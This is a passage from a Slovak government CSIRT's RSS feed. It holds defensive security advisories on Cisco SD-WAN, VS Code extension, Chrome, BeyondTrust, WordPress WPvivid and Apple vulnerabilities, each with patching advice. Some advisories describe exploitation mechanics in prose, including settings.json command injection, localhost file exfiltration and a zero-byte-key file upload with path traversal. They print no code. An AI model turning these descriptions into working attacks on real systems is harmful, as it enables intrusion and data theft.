<p>Ak aktualizáciu nie je možné vykonať v krátkom čase, zraniteľnosť na lokálne nasadených inštanciách je možné dočasne mitigovať nasadením kontroly prístupov (ACL), skupinových bezpečnostných pravidiel a obmedziť prístup na port 22 a 830 iba z dôveryhodných IP adries. Výrobca tiež odporúča nakonfigurovať zariadenia podľa <a href="https://www.cisco.com/c/en/us/td/docs/routers/sdwan/configuration/sdwan-xe-gs-book/cisco-sd-wan-overlay-network-bringup.html#c_Firewall_Ports_for_Viptela_Deployments_8690.xml">jeho manuálu</a><strong>.</strong></p>



<p>Vzhľadom na možné zneužitie zraniteľnosti odporúčame preveriť podozrivé prihlásenia, zaznamenané relácie z podozrivých IP adries, <a href="https://www.rapid7.com/blog/post/etr-critical-cisco-catalyst-vulnerability-exploited-in-the-wild-cve-2026-20127/">a podobne</a><strong>.</strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk</a></li>



<li><a href="https://www.rapid7.com/blog/post/etr-critical-cisco-catalyst-vulnerability-exploited-in-the-wild-cve-2026-20127/">https://www.rapid7.com/blog/post/etr-critical-cisco-catalyst-vulnerability-exploited-in-the-wild-cve-2026-20127/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3141/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – január 2026</title>
		<link>/posts/3120</link>
					<comments>/posts/3120#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 23 Feb 2026 15:06:24 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=3120</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci január 2026....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci január 2026. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2026/02/MS202601.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 01/2026 PDF (1 730 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3120/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v rozšíreniach Visual Studio Code umožňujú vykonávať kód a exfiltrovať dáta</title>
		<link>/posts/3117</link>
					<comments>/posts/3117#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 23 Feb 2026 15:03:26 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Code Runner]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Live Preview]]></category>
		<category><![CDATA[Live Server]]></category>
		<category><![CDATA[Markdown Preview Enhanced]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Visual Studio Code]]></category>
		<guid isPermaLink="false">/?p=3117</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/02/Visual_Studio_Code.png" alt="" /></p>Výskumníci zo spoločnosti Ox Security identifikovali viaceré závažné zraniteľnosti v populárnych rozšíreniach pre Visual Studio Code (VSCode). Útočníci ich môžu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/02/Visual_Studio_Code.png" alt="" /></p>
<p><strong>Výskumníci zo spoločnosti Ox Security identifikovali viaceré závažné zraniteľnosti v populárnych rozšíreniach pre Visual Studio Code (VSCode). Útočníci ich môžu zneužiť na kradnutie lokálnych súborov a vzdialené vykonávanie kódu priamo v prostredí vývojára.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Visual Studio Code Live Server verzia 5.7.9 a staršie</li>



<li>Visual Studio Code Code Runner verzia 0.12.2 a staršie</li>



<li>Visual Studio Code Markdown Preview Enhanced verzia 0.8.18 a staršie</li>



<li>Visual Studio Code Live Preview vo verziách starších ako 0.4.16</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-65715 </strong>(CVSS 3.1 skóre: 7.8)</p>



<p>Zraniteľnosť s&nbsp;označením CVE-2025-65715 sa nachádza v rozšírení Code Runner pre Visual Studio Code. Súvisí s absenciou validácie používateľsky definovaných premenných v konfiguračnom súbore <em>settings.json</em>, konkrétne hodnoty <em>code-runner.executorMap</em>, ktorú rozšírenie bez kontroly preberá do Node.js child_process.spawn() so zapnutým <em>shell: true</em>. Ak útočník dokáže presvedčiť vývojára, aby otvoril škodlivý workspace alebo vložil upravené nastavenie do súboru <em>settings.json</em>, môže pri spustení vyvíjaného kódu dôjsť k vykonaniu ľubovoľného príkazu shell v kontexte používateľa (napr. vytvoreniu reverzného shellu).</p>



<p><strong>CVE-2025-65716 </strong>(CVSS 3.1 skóre: 8.8)</p>



<p>Vysoko závažná zraniteľnosť CVE-2025-65716 sa nachádza v rozšírení Markdown Preview Enhanced pre Visual Studio Code. Súvisí s neošetreným vykresľovaním náhľadu HTML tagov v súboroch .md. Útočník dokáže pri náhľade upraveného dokumentu typu Markdown pomocou iframe vykonať ľubovoľný kód JavaScript v&nbsp;súlade s&nbsp;politikou same-origin. Výskumníci z&nbsp;Ox Security týmto spôsobom dokázali enumerovať porty na zariadení obete a exfiltrovať získané dáta.</p>



<p><strong>CVE-2025-65717 </strong>(CVSS 3.1 skóre: 9.1)</p>



<p>Kritická zraniteľnosť CVE-2025-65717 sa nachádza v rozšírení Live Server pre Visual Studio Code a&nbsp;súvisí s&nbsp;absentujúcou ochranou CORS. Pri spustenom lokálnom HTTP serveri umožňuje vzdialenému útočníkovi bez autentifikácie exfiltrovať súbory z vývojárskeho počítača. Stačí, aby obeť otvorila odkaz na škodlivú webstránku útočníka, ktorá následne zneužije prístup k&nbsp;portu localhost:5500 na prehliadanie a odosielanie citlivých dát na server pod kontrolou útočníka.</p>



<p>Okrem vyššie popísaných zraniteľností našli výskumníci spoločnosti Ox Security zraniteľnosť v&nbsp;rozšírení Microsoft Live Preview, ktorá nedostala číslo CVE. Jedná sa o&nbsp;chybu zabezpečenia, ktorá súvisí s&nbsp;možnosťou neužiť neošetrený parameter <em>relativePathFormatted</em>, čo útočníkovi umožňuje vykonávať útoky typu XSS a bez autentifikácie&nbsp;enumerovať a pristupovať k súborom obete. &nbsp;Útočník môže získať tajomstvá, prístupové kľúče a&nbsp;iné citlivé informácie zo zariadenia obete.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Únik citlivých údajov</strong><strong></strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Organizáciám odporúčame aktualizovať všetky rozšírenia pre Visual Studio Code na opravené verzie a povoliť iba pre projekt nevyhnutné doplnky z dôveryhodných zdrojov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.ox.security/blog/xssinlivepreview/?_gl=1*1ydb6pv*_up*MQ..*_ga*NTIzNzI0NDU1LjE3NzEzNTQ2Mjg.*_ga_BEXTPVWPX8*czE3NzEzNTQ2MjYkbzEkZzAkdDE3NzEzNTQ2MjYkajYwJGwwJGgw">https://www.ox.security/blog/xssinlivepreview/?_gl=1*1ydb6pv*_up*MQ..*_ga*NTIzNzI0NDU1LjE3NzEzNTQ2Mjg.*_ga_BEXTPVWPX8*czE3NzEzNTQ2MjYkbzEkZzAkdDE3NzEzNTQ2MjYkajYwJGwwJGgw</a></li>



<li><a href="https://www.ox.security/blog/cve-2025-65717-live-server-vscode-vulnerability/?_gl=1*13zfoyu*_up*MQ..*_ga*NTIzNzI0NDU1LjE3NzEzNTQ2Mjg.*_ga_BEXTPVWPX8*czE3NzEzNTQ2MjYkbzEkZzAkdDE3NzEzNTQ2MjYkajYwJGwwJGgw">https://www.ox.security/blog/cve-2025-65717-live-server-vscode-vulnerability/?_gl=1*13zfoyu*_up*MQ..*_ga*NTIzNzI0NDU1LjE3NzEzNTQ2Mjg.*_ga_BEXTPVWPX8*czE3NzEzNTQ2MjYkbzEkZzAkdDE3NzEzNTQ2MjYkajYwJGwwJGgw</a></li>



<li><a href="https://www.ox.security/blog/cve-2025-65715-code-runner-vscode-rce/?_gl=1*13zfoyu*_up*MQ..*_ga*NTIzNzI0NDU1LjE3NzEzNTQ2Mjg.*_ga_BEXTPVWPX8*czE3NzEzNTQ2MjYkbzEkZzAkdDE3NzEzNTQ2MjYkajYwJGwwJGgw">https://www.ox.security/blog/cve-2025-65715-code-runner-vscode-rce/?_gl=1*13zfoyu*_up*MQ..*_ga*NTIzNzI0NDU1LjE3NzEzNTQ2Mjg.*_ga_BEXTPVWPX8*czE3NzEzNTQ2MjYkbzEkZzAkdDE3NzEzNTQ2MjYkajYwJGwwJGgw</a></li>



<li><a href="https://www.ox.security/blog/cve-2025-65716-markdown-preview-enhanced-vscode-vulnerability/?_gl=1*13zfoyu*_up*MQ..*_ga*NTIzNzI0NDU1LjE3NzEzNTQ2Mjg.*_ga_BEXTPVWPX8*czE3NzEzNTQ2MjYkbzEkZzAkdDE3NzEzNTQ2MjYkajYwJGwwJGgw">https://www.ox.security/blog/cve-2025-65716-markdown-preview-enhanced-vscode-vulnerability/?_gl=1*13zfoyu*_up*MQ..*_ga*NTIzNzI0NDU1LjE3NzEzNTQ2Mjg.*_ga_BEXTPVWPX8*czE3NzEzNTQ2MjYkbzEkZzAkdDE3NzEzNTQ2MjYkajYwJGwwJGgw</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-65715">https://nvd.nist.gov/vuln/detail/CVE-2025-65715</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-65716">https://nvd.nist.gov/vuln/detail/CVE-2025-65716</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-65717">https://nvd.nist.gov/vuln/detail/CVE-2025-65717</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/flaws-in-popular-vscode-extensions-expose-developers-to-attacks/">https://www.bleepingcomputer.com/news/security/flaws-in-popular-vscode-extensions-expose-developers-to-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3117/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kyberbezpečnostná hra: Fakt alebo Mýtus</title>
		<link>/posts/3114</link>
					<comments>/posts/3114#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 19 Feb 2026 14:13:25 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[kyberbezpecnostna hra]]></category>
		<category><![CDATA[VJ CSIRT]]></category>
		<guid isPermaLink="false">/?p=3114</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>Pripravili sme si pre Vás interaktívnu kyberbezpečnostnú hru „Fakt alebo Mýtus“, ktorá zábavnou formou preverí Vaše znalosti a zároveň Vám...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>Pripravili sme si pre Vás interaktívnu kyberbezpečnostnú hru „Fakt alebo Mýtus“, ktorá zábavnou formou preverí Vaše znalosti a zároveň Vám priblíži reálne kybernetické hrozby a spôsoby ochrany pred nimi.</p>



<p>Prostredníctvom 30 krátkych otázok sa dozviete, ako fungujú útoky, aké chyby útočníci najčastejšie zneužívajú a ako Vám môže Vládna jednotka CSIRT pomôcť zvýšiť úroveň Vašej kybernetickej bezpečnosti.</p>



<p><a href="https://csirt.sk/kyberbezpecnostna-hra.html" target="_blank" rel="noreferrer noopener">Otestujte sa</a> a zistite, ako ste pripravení čeliť vybraným kybernetickým hrozbám: <a href="https://csirt.sk/kyberbezpecnostna-hra.html" target="_blank" rel="noreferrer noopener">https://csirt.sk/kyberbezpecnostna-hra.html</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3114/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v Google Chrome umožňuje vzdialene vykonávať kód</title>
		<link>/posts/3109</link>
					<comments>/posts/3109#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 16 Feb 2026 14:46:14 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3109</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>Vývojári spoločnosti Google opravili vysoko závažnú aktívne zneužívanú zraniteľnosť v&#160;prehliadači Chrome, ktorá umožňuje vzdialené vykonanie kódu. Zraniteľné systémy: Opis činnosti:...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>
<p><strong>Vývojári spoločnosti Google opravili vysoko závažnú aktívne zneužívanú zraniteľnosť v&nbsp;prehliadači Chrome, ktorá umožňuje vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Chrome pre Windows/macOS verzie staršie ako 145.0.7632.75/76</li>



<li>Chrome pre Linux verzie staršie ako 144.0.7559.75</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-2441 </strong>(CVSS 3.1 skóre 8,8)</p>



<p>Spoločnosť Google opravila vysoko závažnú zraniteľnosť v prehliadači Google Chrome, ktorá umožňuje vzdialenému útočníkovi <strong>spustiť ľubovoľný kód v sandboxe prostredníctvom špeciálne vytvorenej HTML stránky</strong>. Zraniteľnosť sa nachádza v komponente CSS a súvisí s možnosťou použitia dealokovanej pamäte. Pre jej zneužitie potrebuje útočník presvedčiť obeť, aby navštívila špeciálne vytvorenú webstránku.</p>



<p><strong>Zraniteľnosť je aktívne zneužívaná. </strong>Objavil ju bezpečnostný výskumník Shaheen Fazim.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Používateľom odporúčame bezodkladne aktualizovať prehliadač Google Chrome na verziu 145.0.7632.75/76 (Windows, macOS), resp. 144.0.7559.75 (Linux) alebo novšiu.</p>



<p><strong>Zdroj:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/cve-2026-2441">https://nvd.nist.gov/vuln/detail/cve-2026-2441</a></li>



<li><a href="https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html">https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html</a></li>



<li><a href="https://thehackernews.com/2026/02/new-chrome-zero-day-cve-2026-2441-under.html">https://thehackernews.com/2026/02/new-chrome-zero-day-cve-2026-2441-under.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3109/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností január 2026</title>
		<link>/posts/3104</link>
					<comments>/posts/3104#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 16 Feb 2026 09:05:35 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=3104</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci január 2026....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci január 2026.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2026/02/2026_01_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 01/2026 PDF (632 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3104/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť BeyondTrust Remote Support a Privileged Remote Access umožňuje vykonávať príkazy</title>
		<link>/posts/3101</link>
					<comments>/posts/3101#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 16 Feb 2026 08:52:03 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[BeyondTrust]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privileged Remote Access]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Remote Support]]></category>
		<guid isPermaLink="false">/?p=3101</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/02/BeyondTrust.png" alt="" /></p>Vývojári BeyondTrust Remote Support a Privileged Remote Access opravili kritickú zraniteľnosť, ktorá umožňuje vzdialenému neautentifikovanému útočníkovi vykonávať systémové príkazy na...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/02/BeyondTrust.png" alt="" /></p>
<p><strong>Vývojári BeyondTrust Remote Support a Privileged Remote Access opravili kritickú zraniteľnosť, ktorá umožňuje vzdialenému neautentifikovanému útočníkovi vykonávať systémové príkazy na zraniteľnom systéme.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>BeyondTrust Remote Support (RS) 25.3.1 a staršie</li>



<li>BeyondTrust Privileged Remote Access (PRA) 24.3.4 a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-1731</strong> (CVSS skóre 9,9)</p>



<p>Spoločnosť BeyondTrust opravila kritickú zraniteľnosť v produktoch Remote Support a Privileged Remote Access. CVE-2026-1731 umožňuje neautentifikovanému útočníkovi odoslať špeciálne upravené klientske požiadavky pre vzdialené vykonanie systémových príkazov na cieľovom systéme v kontexte „site user“. Úspešné zneužitie zraniteľnosti môže viesť ku kompromitácii zraniteľného systému, krádeži dát a zneprístupneniu služby.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Únik citlivých údajov</strong></li>



<li><strong>Zneprístupnenie služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom lokálnych inštancií odporúčame bezodkladnú aktualizáciu aspoň na verzie RS 25.3.2 a PRA 25.1.1, resp. inštaláciu záplat Patch BT26-02-RS (v21.3 &#8211; 25.3.1) a Patch BT26-02-PRA (v22.1 &#8211; 24.X).</p>



<p>Pokiaľ používate verziu RS staršiu ako 21.3 a/alebo verziu PRA staršiu ako 22.1, potrebujete pre ošetrenie zraniteľnosti prejsť na podporovanú verziu.</p>



<p>Cloudové inštancie spoločnosť aktualizovala automaticky a používatelia nepotrebujú vykonať žiadne opatrenia.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.beyondtrust.com/trust-center/security-advisories/bt26-02" target="_blank" rel="noreferrer noopener">https://www.beyondtrust.com/trust-center/security-advisories/bt26-02</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-1731">https://nvd.nist.gov/vuln/detail/CVE-2026-1731</a></li>



<li><a href="https://arcticwolf.com/resources/blog/cve-2026-1731/">https://arcticwolf.com/resources/blog/cve-2026-1731/</a></li>



<li><a href="https://socradar.io/blog/cve-2026-1731-rce-beyondtrust-rs-pra/">https://socradar.io/blog/cve-2026-1731-rce-beyondtrust-rs-pra/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3101/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť modulu WPvivid Backup &#038; Migration pre WordPress umožňuje vykonávať kód</title>
		<link>/posts/3098</link>
					<comments>/posts/3098#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 16 Feb 2026 08:42:33 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[WPvivid Backup & Migration]]></category>
		<guid isPermaLink="false">/?p=3098</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/02/WPvivid.png" alt="" /></p>Vývojári modulu WPvivid Backup &#38; Migration pre WordPress opravili kritickú zraniteľnosť, ktorá umožňuje útočníkom zneužiť proces výmeny šifrovacích kľúčov na...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/02/WPvivid.png" alt="" /></p>
<p><strong>Vývojári modulu WPvivid Backup &amp; Migration pre WordPress opravili kritickú zraniteľnosť, ktorá umožňuje útočníkom zneužiť proces výmeny šifrovacích kľúčov na podvrhnutie ľubovoľného škodlivého súboru a&nbsp;jeho nahratie do ľubovoľného verejne dostupného adresáru.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WPvivid Backup &amp; Migration verzie 0.9.123 a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-1357</strong> (CVSS skóre 9,8)</p>



<p>Bezpečnostní výskumníci upozorňujú na kritickú zraniteľnosť v doplnku WPvivid Backup &amp; Migration pre WordPress. Zraniteľnosť s označením CVE-2026-1357 umožňuje neautentifikovanému útočníkovi nahrať ľubovoľné súbory a vzdialene vykonať kód na zasiahnutých webových stránkach.</p>



<p>Chyba zabezpečenia vyplýva z nevhodného postupu aplikácie po chybnom dešifrovaní šifrovacieho kľúča relácie vo funkcii <em>openssl_private_decrypt()</em>, kde nedochádza k ukončeniu procesu. Vygenerovanú chybovú hodnotu (boolean false) preberie mechanizmus pre šifrovanie AES ako reťazec/kľúč nulových bajtov. To umožňuje útočníkovi a podvrhnúť ľubovoľný súbor šifrovaný kľúčom z nulových bajtov. Modul tiež po dešifrovaní obsahu neošetruje používateľom dodané názvy súborov, čo umožňuje útočníkovi zneužiť parameter <em>wpvivid_action=send_to_site</em> a prechádzať verejne dostupnými adresármi mimo ošetrené úložisko, kam môže uložiť ľubovoľný súbor.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia modulu WPvivid Backup &amp; Migration aspoň na verziu 0.9.124.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-1357" target="_blank" rel="noreferrer noopener">https://nvd.nist.gov/vuln/detail/CVE-2026-1357</a></li>



<li><a href="https://gbhackers.com/wordpress-backup-plugin-vulnerability/">https://gbhackers.com/wordpress-backup-plugin-vulnerability/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3098/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Apple opravila aktívne zneužívanú zero-day zraniteľnosť svojich operačných systémov</title>
		<link>/posts/3093</link>
					<comments>/posts/3093#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Feb 2026 14:34:19 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[0-day]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3093</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>Spoločnosť Apple vydala bezpečnostné aktualizácie svojich operačných systémov iOS, iPadOS, macOS, tvOS, watchOS a visionOS, ktoré opravujú viacero zraniteľností, z...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>
<p><strong>Spoločnosť Apple vydala bezpečnostné aktualizácie svojich operačných systémov iOS, iPadOS, macOS, tvOS, watchOS a visionOS, ktoré opravujú viacero zraniteľností, z čoho jedna je označená ako aktívne zneužívaná zero-day. </strong><strong></strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li><strong>Zariadenia s&nbsp;operačným systémom</strong> watchOS starším ako 26.3</li>



<li><strong>Zariadenia s&nbsp;operačným systémom</strong> tvOS starším ako 26.3</li>



<li><strong>Zariadenia s&nbsp;operačným systémom</strong> macOS Tahoe starším ako 26.3</li>



<li><strong>Zariadenia s&nbsp;operačným systémom</strong> visionOS starším ako 26.3</li>



<li><strong>Zariadenia s&nbsp;operačným systémom</strong> iOS starším ako 26.3</li>



<li><strong>Zariadenia s&nbsp;operačným systémom</strong> iPadOS starším ako 26.3</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2026-20700</strong></p>



<p>Aktívne zneužívaná zero-day zraniteľnosť s&nbsp;označením CVE-2026-20700 sa nachádza v komponente Dynamic Link Editor (dyld) a vedie ku poškodeniu pamäte. Útočník schopný zapisovať do pamäte by ju mohol zneužiť na vykonanie ľubovoľného kódu.&nbsp;</p>



<p>Predmetná zraniteľnosť bola spoločne s CVE-2025-14174 a CVE-2025-43529 v decembri 2025&nbsp;zneužitá v rámci sofistikovaných útokov na používateľov iOS.<strong></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Apple odporúča <a href="https://support.apple.com/en-us/100100" target="_blank" rel="noreferrer noopener">bezodkladnú aktualizáciu operačných systémov</a> aspoň na verzie</p>



<ul>
<li>iOS 26.3</li>



<li>iPadOS 26.3</li>



<li>macOS Tahoe 26.3</li>



<li>tvOS 26.3</li>



<li>watchOS 26.3</li>



<li>visionOS 26.3</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/security/apple-fixes-zero-day-flaw-used-in-extremely-sophisticated-attacks/" target="_blank" rel="noreferrer noopener">https://www.bleepingcomputer.com/news/security/apple-fixes-zero-day-flaw-used-in-extremely-sophisticated-attacks/</a></li>



<li><a href="https://thehackernews.com/2026/02/apple-fixes-exploited-zero-day.html" target="_blank" rel="noreferrer noopener">https://thehackernews.com/2026/02/apple-fixes-exploited-zero-day.html</a></li>



<li><a href="https://support.apple.com/en-us/126346" target="_blank" rel="noreferrer noopener">https://support.apple.com/en-us/126346</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-20700" target="_blank" rel="noreferrer noopener">https://nvd.nist.gov/vuln/detail/CVE-2026-20700</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3093/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť Windows Notepad umožňuje vzdialené vykonanie kódu prostredníctvom dokumentov Markdown</title>
		<link>/posts/3090</link>
					<comments>/posts/3090#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Feb 2026 14:22:11 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[notepad]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">/?p=3090</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/02/notepad-1.jpg" alt="" /></p>Spoločnosť Microsoft v rámci Patch Tuesday vo februári 2026 opravila vysoko závažnú bezpečnostnú zraniteľnosť v textovom editore Windows Notepad.  CVE-2026-20841...]]></description>
